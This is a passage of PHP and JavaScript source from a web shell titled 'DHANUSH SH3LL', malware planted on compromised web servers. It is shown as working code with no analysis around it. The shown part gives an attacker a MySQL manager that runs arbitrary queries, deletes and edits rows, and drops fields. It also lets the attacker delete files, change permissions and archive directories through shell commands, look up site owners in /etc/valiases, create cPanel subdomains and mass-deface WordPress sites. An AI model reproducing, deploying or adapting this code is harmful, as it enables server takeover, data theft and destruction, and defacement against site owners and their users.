5743 if($_GET['action'] == 'viewdb')
5744 {
5745 listdatabase();
5746 }
5747
5748 // View Table Schema
5749 if($_GET['action'] == "viewSchema")
5750 {
5751 $dbserver = $_COOKIE["dbserver"];
5752 $dbuser = $_COOKIE["dbuser"];
5753 $dbpass = $_COOKIE["dbpass"];
5754 $dbname = $_GET['dbname'];
5755 $tablename = $_GET['tablename'];
5756 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5757 mysql_select_db($dbname);
5758 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5759 $pResult = mysql_query( "SHOW fields FROM $tablename" );
5760 $num = mysql_num_rows( $pResult );
5761 echo "<br><br><table class=btmtbl align=center cellspacing=4 style='width:80%;' border=1>";
5762 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
5763 for( $i = 0; $i < $num; $i++ )
5764 {
5765 $field = mysql_fetch_array( $pResult );
5766 echo "<tr>\n";
5767 echo "<td>".$field["Field"]."</td>\n";
5768 echo "<td>".$field["Type"]."</td>\n";
5769 echo "<td>".$field["Null"]."</td>\n";
5770 echo "<td>".$field["Key"]."</td>\n";
5771 echo "<td>".$field["Default"]."</td>\n";
5772 echo "<td>".$field["Extra"]."</td>\n";
5773 $fieldname = $field["Field"];
5774 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
5775 echo "</tr>\n";
5776 }
5777 echo "</table>";
5778 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5779 }
5780
5781 // Execute Query
5782 if($_GET['action'] == "executequery")
5783 {
5784 $dbserver = $_COOKIE["dbserver"];
5785 $dbuser = $_COOKIE["dbuser"];
5786 $dbpass = $_COOKIE["dbpass"];
5787 $dbname = $_GET['dbname'];
5788 $tablename = $_GET['tablename'];
5789 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5790 mysql_select_db($dbname);
5791 $result = mysql_query($_GET['executemyquery']);
5792
5793 // results
5794 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
5795
5796 $count = 0;
5797 while ($row = mysql_fetch_assoc($result))
5798 {
5799 echo "<tr>\r\n";
5800
5801 if ($count==0) // list column names
5802 {
5803 echo "<tr>\r\n";
5804 while($key = key($row))
5805 {
5806 echo "<td><b>" . $key . "</b></td>\r\n";
5807 next($row);
5808 }
5809 echo "</tr>\r\n";
5810 }
5811
5812 foreach($row as $r) // list content of column names
5813 {
5814 if ($r=='') $r = '<font >NULL</font>';
5815 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
5816 }
5817 echo "</tr>\r\n";
5818 $count++;
5819 }
5820 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
5821 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5822 }
5823
5824 // View Table Data
5825 if($_GET['action'] == "viewdata")
5826 {
5827 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
5828 $dbserver = $_COOKIE["dbserver"];
5829 $dbuser = $_COOKIE["dbuser"];
5830 $dbpass = $_COOKIE["dbpass"];
5831 $dbname = $_GET['dbname'];
5832 $tablename = $_GET['tablename'];
5833 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5834 ?>
5835 <br><br>
5836 <form>
5837 <table>
5838 <tr>
5839 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
5840 </tr>
5841 <tr>
5842 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
5843 </tr>
5844 </table>
5845 </form>
5846 <?php
5847 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5848 mysql_select_db($dbname);
5849
5850 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5851 $row = mysql_fetch_array($sql);
5852 $rowid = $row['COLUMN_NAME'];
5853
5854 echo "<br><font size=4>Data in Table</font><br>";
5855 if( $tablename != "" )
5856 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
5857 else
5858 echo "<font size=3 class=txt>$dbname</font><br>";
5859
5860 $queryStr = "";
5861 $pag = 0;
5862 $queryStr = stripslashes( $queryStr );
5863 if( $queryStr == "" )
5864 {
5865 if(isset($_REQUEST['page']))
5866 {
5867 $res = mysql_query("select * from $tablename");
5868 $getres = mysql_num_rows($res);
5869 $coun = ceil($getres/30);
5870 if($_REQUEST['page'] != 1)
5871
5872 $pag = $_REQUEST['page'] * 30;
5873 else
5874 $pag = $_REQUEST['page'] * 30;
5875
5876 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
5877 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
5878 $arrcount = 1;
5879 $arrdata[$arrcount] = 0;
5880 while($row = mysql_fetch_array($sql))
5881 {
5882 $arrdata[$arrcount] = $row[$rowid];
5883 $arrcount++;
5884 }
5885 }
5886 else
5887 {
5888 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
5889 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
5890 $arrcount = 1;
5891 $arrdata[$arrcount] = 0;
5892 while($row = mysql_fetch_array($sql))
5893 {
5894 $arrdata[$arrcount] = $row[$rowid];
5895 $arrcount++;
5896 }
5897 }
5898 if( $orderby != "" )
5899 $queryStr .= " ORDER BY $orderby";
5900 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
5901 }
5902
5903
5904 $pResult = mysql_query($queryStr );
5905 $fieldt = mysql_fetch_field($pResult);
5906 $tablename = $fieldt->table;
5907 $errMsg = mysql_error();
5908
5909 $GLOBALS[queryStr] = $queryStr;
5910
5911 if( $pResult == false )
5912 {
5913 echoQueryResult();
5914 return;
5915 }
5916 if( $pResult == 1 )
5917 {
5918 $errMsg = "Success";
5919 echoQueryResult();
5920 return;
5921 }
5922
5923 echo "<hr color='#1B1B1B'>\n";
5924
5925 $row = mysql_num_rows( $pResult );
5926 $col = mysql_num_fields( $pResult );
5927
5928 if( $row == 0 )
5929 {
5930 echo "<font size=3>No Data Exist!</font>";
5931 return;
5932 }
5933
5934 if( $rowperpage == "" ) $rowperpage = 30;
5935 if( $page == "" ) $page = 0;
5936 else $page--;
5937 mysql_data_seek( $pResult, $page * $rowperpage );
5938
5939 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 align=center>\n";
5940 echo "<tr>\n";
5941 for( $i = 0; $i < $col; $i++ )
5942 {
5943 $field = mysql_fetch_field( $pResult, $i );
5944 echo "<th>";
5945 if($action == "viewdata")
5946 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
5947 else
5948 echo $field->name."\n";
5949 echo "</th>\n";
5950 }
5951 echo "<th colspan=2>Action</th>\n";
5952 echo "</tr>\n";
5953 $num=1;
5954
5955
5956 $acount = 1;
5957
5958 for( $i = 0; $i < $rowperpage; $i++ )
5959 {
5960 $rowArray = mysql_fetch_row( $pResult );
5961 if( $rowArray == false ) break;
5962 echo "<tr>\n";
5963 $key = "";
5964 for( $j = 0; $j < $col; $j++ )
5965 {
5966 $data = $rowArray[$j];
5967
5968 $field = mysql_fetch_field( $pResult, $j );
5969 if( $field->primary_key == 1 )
5970 $key .= "&" . $field->name . "=" . $data;
5971
5972 if( strlen( $data ) > 30 )
5973 $data = substr( $data, 0, 30 ) . "...";
5974 $data = htmlspecialchars( $data );
5975 echo "<td>\n";
5976 echo "<font class=txt>$data</font>\n";
5977 echo "</td>\n";
5978 }
5979
5980 if(!is_numeric($arrdata[$acount]))
5981 echo "<td colspan=2>No Key</td>\n";
5982 else
5983 {
5984 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
5985 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
5986 $acount++;
5987 }
5988 }
5989 echo "</tr>\n";
5990
5991
5992 echo "</table>";
5993 if($arrcount > 30)
5994 {
5995 $res = mysql_query("select * from $tablename");
5996 $getres = mysql_num_rows($res);
5997 $coun = ceil($getres/30);
5998 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
5999 for($i=0;$i<$coun;$i++)
6000 echo "<option value=$i>$i</option>";
6001
6002 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
6003 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6004 }
6005 }
6006
6007 // Delete Table Data
6008 if($_GET['action'] == "deleteData")
6009 {
6010 $dbserver = $_COOKIE["dbserver"];
6011 $dbuser = $_COOKIE["dbuser"];
6012 $dbpass = $_COOKIE["dbpass"];
6013 $dbname = $_GET['dbname'];
6014 $tablename = $_GET['tablename'];
6015 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6016 mysql_select_db($dbname);
6017 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6018 $row = mysql_fetch_array($sql);
6019 $row = $row['COLUMN_NAME'];
6020 $rowid = $_GET[$row];
6021 mysql_query("delete from $tablename where $row = '$rowid'");
6022 listtable();
6023 }
6024 // Edit Table Data
6025 if($_GET['action'] == "editData")
6026 {
6027 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
6028 $dbserver = $_COOKIE["dbserver"];
6029 $dbuser = $_COOKIE["dbuser"];
6030 $dbpass = $_COOKIE["dbpass"];
6031 $dbname = $_GET['dbname'];
6032 $tablename = $_GET['tablename'];
6033 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6034 ?>
6035 <br><br>
6036 <form action="<?php echo $self; ?>" method="post">
6037 <?php
6038 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6039 mysql_select_db($dbname);
6040
6041 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6042 $row = mysql_fetch_array($sql);
6043 $row = $row['COLUMN_NAME'];
6044 $rowid = $_GET[$row];
6045
6046 $pResult = mysql_list_fields( $dbname, $tablename );
6047 $num = mysql_num_fields( $pResult );
6048
6049 $key = "";
6050 for( $i = 0; $i < $num; $i++ )
6051 {
6052 $field = mysql_fetch_field( $pResult, $i );
6053 if( $field->primary_key == 1 )
6054 if( $field->numeric == 1 )
6055 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
6056 else
6057 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
6058 }
6059 $key = substr( $key, 0, strlen($key)-4 );
6060
6061 mysql_select_db( $dbname, $mysqlHandle );
6062 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
6063 $data = mysql_fetch_array( $pResult );
6064
6065 echo "<table class=btmtbl cellspacing=1 cellpadding=2 border=1>\n";
6066 echo "<tr>\n";
6067 echo "<th>Name</th>\n";
6068 echo "<th>Type</th>\n";
6069 echo "<th>Function</th>\n";
6070 echo "<th>Data</th>\n";
6071 echo "</tr>\n";
6072
6073 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6074 $num = mysql_num_rows( $pResult );
6075
6076 $pResultLen = mysql_list_fields( $dbname, $tablename );
6077 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
6078 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
6079 for( $i = 0; $i < $num; $i++ )
6080 {
6081 $field = mysql_fetch_array( $pResult );
6082 $fieldname = $field["Field"];
6083 $fieldtype = $field["Type"];
6084 $len = mysql_field_len( $pResultLen, $i );
6085
6086 echo "<tr>";
6087 echo "<td>$fieldname</td>";
6088 echo "<td>".$field["Type"]."</td>";
6089 echo "<td>\n";
6090 echo "<select name=${fieldname}_function class=sbox>\n";
6091 echo "<option>\n";
6092 echo "<option>ASCII\n";
6093 echo "<option>CHAR\n";
6094 echo "<option>SOUNDEX\n";
6095 echo "<option>CURDATE\n";
6096 echo "<option>CURTIME\n";
6097 echo "<option>FROM_DAYS\n";
6098 echo "<option>FROM_UNIXTIME\n";
6099 echo "<option>NOW\n";
6100 echo "<option>PASSWORD\n";
6101 echo "<option>PERIOD_ADD\n";
6102 echo "<option>PERIOD_DIFF\n";
6103 echo "<option>TO_DAYS\n";
6104 echo "<option>USER\n";
6105 echo "<option>WEEKDAY\n";
6106 echo "<option>RAND\n";
6107 echo "</select>\n";
6108 echo "</td>\n";
6109 $value = htmlspecialchars($data[$i]);
6110 $type = strtok( $fieldtype, " (,)\n" );
6111 if( $type == "enum" || $type == "set" )
6112 {
6113 echo "<td>\n";
6114 if( $type == "enum" )
6115 echo "<select name=$fieldname class=box>\n";
6116 else if( $type == "set" )
6117 echo "<select name=$fieldname size=4 class=box multiple>\n";
6118 while( $str = strtok( "'" ) )
6119 {
6120 if( $value == $str )
6121 echo "<option selected>$str\n";
6122 else
6123 echo "<option>$str\n";
6124 strtok( "'" );
6125 }
6126 echo "</select>\n";
6127 echo "</td>\n";
6128 }
6129 else
6130 {
6131 if( $len < 40 )
6132 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
6133 else
6134 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
6135 }
6136 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6137 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6138 echo "</tr>";
6139 }
6140 $fundata1=eregi_replace(',$', '', $fundata1);
6141 $fundata2=eregi_replace(',$', '', $fundata2);
6142
6143 echo "</table><p>\n";
6144 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
6145 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
6146 echo "</form>\n";
6147 }
6148 }
6149// Edit Submit Table Data
6150else if($_REQUEST['action'] == "editsubmitData")
6151{
6152 $dbserver = $_COOKIE["dbserver"];
6153 $dbuser = $_COOKIE["dbuser"];
6154 $dbpass = $_COOKIE["dbpass"];
6155 $dbname = $_POST['dbname'];
6156 $tablename = $_POST['tablename'];
6157
6158 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6159 mysql_select_db($dbname);
6160
6161 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6162 $row = mysql_fetch_array($sql);
6163 $row = $row['COLUMN_NAME'];
6164 $rowid = $_POST[$row];
6165
6166 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6167 $num = mysql_num_rows( $pResult );
6168
6169 $rowcount = $num;
6170
6171 $pResultLen = mysql_list_fields( $dbname, $tablename );
6172
6173 for( $i = 0; $i < $num; $i++ )
6174 {
6175 $field = mysql_fetch_array( $pResult );
6176 $fieldname = $field["Field"];
6177 $arrdata = $_REQUEST[$fieldname];
6178
6179 $str .= " " . $fieldname . " = '" . $arrdata . "'";
6180 $rowcount--;
6181 if($rowcount != 0)
6182 $str .= ",";
6183 }
6184
6185 $str = "update $tablename set" . $str . " where $row=$rowid";
6186 mysql_query($str);
6187 ?><div id="showsql"></div><?php
6188}
6189// Insert Table Data
6190else if($_REQUEST['action'] == "insertdata")
6191{
6192 $dbserver = $_COOKIE["dbserver"];
6193 $dbuser = $_COOKIE["dbuser"];
6194 $dbpass = $_COOKIE["dbpass"];
6195 $dbname = $_POST['dbname'];
6196 $tablename = $_POST['tablename'];
6197
6198 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6199 mysql_select_db($dbname);
6200
6201 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6202 $row = mysql_fetch_array($sql);
6203 $row = $row['COLUMN_NAME'];
6204 $rowid = $_POST[$row];
6205
6206 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6207 $num = mysql_num_rows( $pResult );
6208
6209 $rowcount = $num;
6210
6211 $pResultLen = mysql_list_fields( $dbname, $tablename );
6212
6213 for( $i = 0; $i < $num; $i++ )
6214 {
6215 $field = mysql_fetch_array( $pResult );
6216 $fieldname = $field["Field"];
6217 $arrdata = $_REQUEST[$fieldname];
6218
6219 $str1 .= "".$fieldname . ",";
6220 $str2 .= "'".$arrdata . "',";
6221 $rowcount--;
6222 if($rowcount != 0)
6223 {
6224 //$str1 .= $fieldname . ",";
6225 //$str2 .= $arrdata . ",";
6226 }
6227 }
6228 $str1=eregi_replace(',$', '', $str1);
6229 $str2=eregi_replace(',$', '', $str2);
6230 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
6231 mysql_query($str);
6232
6233 ?><div id="showsql"></div><?php
6234}
6235else if(isset($_GET['logoutdb']))
6236{
6237 setcookie("dbserver",time() - 60*60);
6238 setcookie("dbuser",time() - 60*60);
6239 setcookie("dbpass",time() - 60*60);
6240 header("Location:$self");
6241}
6242else if(isset($_POST['choice']))
6243{
6244 if($_POST['choice'] == "delete")
6245 {
6246 $actbox = $_POST["actbox"];
6247 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6248
6249 foreach ($actbox as $myv)
6250 $myv = explode(",",$myv);
6251 foreach ($myv as $v)
6252 {
6253 if(is_file($v))
6254 {
6255 if(unlink($v))
6256 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
6257 else
6258 echo "<br><center>Cannot Delete File $v</center>";
6259 }
6260 else if(is_dir($v))
6261 {
6262 rrmdir($v);
6263 }
6264 }
6265 echo '<br>';
6266 }
6267 else if($_POST['choice'] == "chmod")
6268 { ?>
6269 <BR><form id="chform"><?php
6270 $actbox1 = $_POST['actbox'];
6271 foreach ($actbox1 as $myv)
6272 $myv = explode(",",$myv);
6273 foreach ($myv as $v)
6274 { ?>
6275 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
6276 <?php }
6277 ?>
6278 <table align="center" border="3" style="width:40%; border-color:#333333;">
6279 <tr>
6280 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
6281 </tr>
6282 <tr>
6283 <td colspan="2" align="center" style="height:60px">
6284 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" />
6285 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" /></form></center>
6286 </td>
6287 </tr>
6288 </table>
6289
6290 </form> <?php
6291 }
6292 else if($_POST['choice'] == "changefileperms")
6293 {
6294 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6295 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
6296 {
6297 $actbox = $_POST["actbox"];
6298 foreach ($actbox as $myv)
6299 $myv = explode(",",$myv);
6300 foreach ($myv as $v)
6301 {
6302 if(is_file($v) || is_dir($v))
6303 {
6304 $perms = 0;
6305 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
6306 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
6307 echo "<div align=left style=width:80%;>";
6308 if(@chmod($v,$perms))
6309 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
6310 else
6311 echo "Cannot Change $v File Permissions<br>";
6312 echo "</div>";
6313 }
6314 }
6315
6316 }
6317 }
6318 else if($_POST['choice'] == "compre")
6319 {
6320 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6321 $actbox = $_POST["actbox"];
6322 foreach ($actbox as $myv)
6323 $myv = explode(",",$myv);
6324 foreach ($myv as $v)
6325 {
6326 if(is_file($v))
6327 {
6328 $zip = new ZipArchive();
6329 $filename= basename($v) . '.zip';
6330 if(($zip->open($filename, ZipArchive::CREATE))!==true)
6331 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
6332 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
6333 $zip->addFile(basename($v));
6334 $zip->close();
6335 }
6336 else if(is_dir($v))
6337 {
6338 if($os == "Linux")
6339 {
6340 $filename= basename($v);
6341 execmd("tar --create --recursion --file=$filename.tar $v");
6342 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
6343 }
6344 else
6345 echo "<BR>Cannot compress directory<BR><BR>";
6346 }
6347 }
6348 echo '<BR><BR>';
6349 }
6350 else if($_POST['choice'] == "uncompre")
6351 {
6352 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6353 $actbox = $_POST["actbox"];
6354 foreach ($actbox as $myv)
6355 $myv = explode(",",$myv);
6356 foreach ($myv as $v)
6357 {
6358 if(is_file($v) || is_dir($v))
6359 {
6360 $zip = new ZipArchive;
6361 $filename= basename($v);
6362 $res = $zip->open($filename);
6363 if ($res === TRUE)
6364 {
6365 $pieces = explode(".",$filename);
6366 $zip->extractTo($pieces[0]);
6367 $zip->close();
6368 echo '<BR><font class=txt size=3>File '.$v.' Unzipped successfully</font>';
6369 } else
6370 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
6371 }
6372 }
6373 echo '<BR><BR>';
6374 }
6375}
6376else if(isset($_GET['sitename']))
6377{
6378 $sitename = str_replace("http://","",$_GET['sitename']);
6379 $sitename = str_replace("http://www.","",$sitename);
6380 $sitename = str_replace("www.","",$sitename);
6381 $show = myexe("ls -la /etc/valiases/".$sitename);
6382 if(!empty($show))
6383 echo $show;
6384 else
6385 echo "Cannot get the username";
6386}
6387else if(isset($_GET['mydata']))
6388{
6389 listdatabase();
6390}
6391else if(isset($_GET['home']))
6392{
6393 mainfun($_GET['home']);
6394}
6395else if(isset($_GET['dir']))
6396{
6397 mainfun($_GET['myfilepath']);
6398}
6399else if(isset($_GET['mydirpath']))
6400{
6401 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
6402}
6403else
6404{
6405?>
6406<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
6407<title>DHANUSH SH3LL</title>
6408<script type="text/javascript">
6409checked = false;
6410var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
6411function checkedAll ()
6412{
6413 if (checked == false){checked = true}else{checked = false}
6414 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
6415 {
6416 document.getElementById('myform').elements[i].checked = checked;
6417 }
6418}
6419function change_style(mystyle)
6420{
6421 window.location.href = '<?php echo $self; ?>?style='+mystyle;
6422}
6423function createsubdomain(cpaneluser,cpanelpass,noofsubdomain,subindex)
6424{
6425 var params = "cpaneluser="+cpaneluser+"&cpanelpass="+cpanelpass+"&noofsubdomain="+noofsubdomain+"&subindex="+subindex;
6426 document.getElementById("showmydata").innerHTML=waitstate;
6427 var ajaxRequest;
6428 ajaxRequest = new XMLHttpRequest();
6429
6430 ajaxRequest.onreadystatechange = function()
6431 {
6432 if(ajaxRequest.readyState == 3)
6433 {
6434 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6435 }
6436 }
6437
6438 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6439 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6440 ajaxRequest.send(params);
6441}
6442function massdeface(script,masswpdef,wpsym)
6443{
6444 var params = "massscript="+script+"&massdef="+masswpdef+"&wpsym="+wpsym;
6445 document.getElementById("showdef").innerHTML="<center><marquee scrollamount=4 width=150>It may take long time. Wait....</marquee></center>";
6446 var ajaxRequest;
6447 ajaxRequest = new XMLHttpRequest();
6448
6449 ajaxRequest.onreadystatechange = function()
6450 {
6451 if(ajaxRequest.readyState == 3)
6452 {
6453 document.getElementById("showdef").innerHTML=ajaxRequest.responseText;
6454 }
6455 }
6456
6457 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6458 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6459 ajaxRequest.send(params);
6460}
6461function urlchange(myfilepath)
6462{
6463 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
6464 splitter = "<?php echo addslashes($directorysperator); ?>";
6465 mypath = mpath = myfilepath.split(splitter);
6466 <?php if($os == "Linux") { ?>
6467 r = "/";
6468 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
6469 <?php } ?>
6470 for (i = 0; i < mypath.length; i++)
6471 {
6472 if(mypath[i] == "")
6473 continue;
6474 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
6475
6476 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
6477 }
6478 myurl = myurl.replace(/\\/g,"\\\\");
6479 return myurl;
6480}
6481function wrtblDIR(mydirpath)
6482{
6483 var ajaxRequest;
6484 ajaxRequest = new XMLHttpRequest();
6485
6486 ajaxRequest.onreadystatechange = function()
6487 {
6488 if(ajaxRequest.readyState == 4)
6489 {
6490 for(i=0;i<=3;i++)
6491 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
6492 }
6493 }
6494
6495 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydirpath="+mydirpath, true);
6496 ajaxRequest.send(null);
6497}
6498function setpath(myfilpath)
6499{
6500 wrtblDIR(myfilpath);
6501 document.getElementById("path").value=myfilpath;
6502 document.getElementById("createfile").value=myfilpath;
6503 document.getElementById("readfile").value=myfilpath;
6504 document.getElementById("readdir").value=myfilpath;
6505 document.getElementById("createfolder").value=myfilpath;
6506 document.getElementById("createfolder").value=myfilpath;
6507 document.getElementById("exepath").value=myfilpath;
6508 document.getElementById("auexepath").value=myfilpath;
6509 document.getElementById("showdir").innerHTML="";
6510}
6511function changedir(myaction,myfilepath)
6512{
6513 var myurl = urlchange(myfilepath);
6514
6515 document.getElementById("showmaindata").innerHTML=waitstate;
6516 var ajaxRequest;
6517 ajaxRequest = new XMLHttpRequest();
6518
6519 ajaxRequest.onreadystatechange = function()
6520 {
6521 if(ajaxRequest.readyState == 4)
6522 {
6523 setpath(myfilepath);
6524 document.getElementById("crdir").innerHTML=myurl;
6525 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6526 }
6527 }
6528
6529 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6530 ajaxRequest.send(null);
6531}
6532function gethome(myaction,mydir)
6533{
6534 var myurl = urlchange(mydir);
6535 document.getElementById("showmaindata").innerHTML=waitstate;
6536 var ajaxRequest;
6537 ajaxRequest = new XMLHttpRequest();
6538
6539 ajaxRequest.onreadystatechange = function()
6540 {
6541 if(ajaxRequest.readyState == 4)
6542 {
6543 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6544 setpath(mydir);
